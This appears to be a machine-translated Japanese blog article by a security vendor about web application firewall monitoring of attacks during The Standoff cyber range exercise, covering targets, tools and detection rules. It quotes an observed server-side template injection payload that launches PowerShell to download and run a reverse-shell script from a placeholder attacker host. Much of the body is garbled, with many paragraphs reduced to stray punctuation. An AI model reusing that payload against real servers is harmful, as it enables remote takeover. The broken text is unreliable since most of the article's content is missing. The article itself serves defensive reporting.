WAF評決、またはスタンドオフで企業のデジタルツインのWebリソースに何が起こったのか

最後のスタンドオフでは、PT Expert Security Centerチームが、防衛側からの対立の参加者と並行して、サイトのインフラストラクチャと、サイバーポリゴンに展開された大都市のデジタルコピーの個々のオフィスを監視しました。これを行うには、私たちが展開され、追加のセキュリティオペレーションセンター(SOC) それがあったように、インフラストラクチャ全体をカバーし、それにより「のこぎり」、すべてのスタンドオフの参加者の活動とより少しでもへ。このSOCのツールの1つは、PTアプリケーションファイアウォール(Webアプリケーションレイヤーファイアウォール)でした(以前の記事の1つで、別のSOCツールであるPTサンドボックスの作業結果について読んでください)。)。以下では、Webの観点からサイトで何が起こったか、および攻撃チームが選択したターゲットにのみ焦点を当てます。





一般的な攻撃統計

The Standoffの一環として、サイトのポータル自体、およびトレーニンググラウンドのゲームインフラストラクチャに含まれる30のWebリソースに対する攻撃を監視しました。これらは、メインゲーム(25時間オフィスのメーター-メーターの読み取り値を送信するためのリソース、Nuftの領事-以下で説明するサービス管理プラットフォーム)とバグバウンティ(たとえば、CMS Umbraco)の両方で使用されたリソースでした。 Bank of FFの場合、Mantis Bugtracker for 25 Hoursはソフトウェア製品のバグ追跡システムであり、rConfirRCEはBigBroGroupのネットワーク構成管理サービスです。読み取りチームは、リスクの実装、およびシステムの脆弱性の検索とレポート作成に対してポイントを受け取りました。





サイバーポリゴンの誰が誰でしたか:





- Heavy Ship Logistics — , , , ;









- 25 Hours — , , , ;









- Tube — , , , ;









- Nuft — , ; 









- Big Bro Group — ;









- Bank of FF — . 









— , . — , bug bounty, «» , . 13. bug bounty . «», (, RCE Flack BookStore SQL Injection — capture the flag). 29 30 - ( , ). , , web application firewall.





The Standoff PT Application Firewall — .





図1.ゲーム日ごとの攻撃の分布
1.

. 1 . , — , — , — . , , . .





( The Standoff 12:00 12 14:00 17 ).





図2.最も一般的な攻撃のリスト
2.

, PT Application Firewall, , , , . . , , , . , .





ube Bank of FF: CMS Made Simple (CMS), bbord ( ), CMS Umbraco, Prestoshop ( ), Avideo encoder ( ), FHEM tomcat ( ), Consul, openEMR ( ), ATutor ( ) rConfig.





. nmap Burp Suite Python Go: Metasploit. burp suite, Metasploit, Responder-.





30 , , , 5 6 2 6 . , — , .





.





« 25 Hours» Meters. , . HubL, {{}} . , , . : {{7*7}} , 7*7.





図3.PT Application Firewall for Metersアプリケーションでのサーバー側テンプレートインジェクション(SSTI)の検出(スタンドオフに適合した検出ルール)
3. Server Side Template Injection (SSTI) PT Application Firewall Meters ( The Standoff )
図4.MetersアプリケーションのSSTI攻撃の分布
4. SSTI Meters





:





{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval("var x=new java.lang.ProcessBuilder(\"cmd.exe\",\"/c\",\"powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/mini-reverse.ps1');\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}}.
      
      



.





, (, ), ( ) .





— , Nuft Consul. . Server Side Request Forgery, Gopher PUT .





200 .





図5.領事アプリケーション(RCE)への攻撃。
5. Consul (RCE).

, ( — ) ( — ).





( false positive) . .





proofs of concept , . , , , .





, CMS Umbraco ( Bank of FF) , - POST; .





図6.CMSUmbracoのWebトラフィックで攻撃を検出するためのルール
6. - CMS Umbraco

, Meters, , — .





図7. {}でインタープリターによって実行されたコマンドのメーターへの攻撃を検出するためのルール
7. Meters , {}

request path .





30 . , . . , (ODBC) backup «» .





, ( The Standoff) , , . web application firewall. PT Application Firewall , . , false positive , .





Positive Technologies (PT Expert Security Center)








All Articles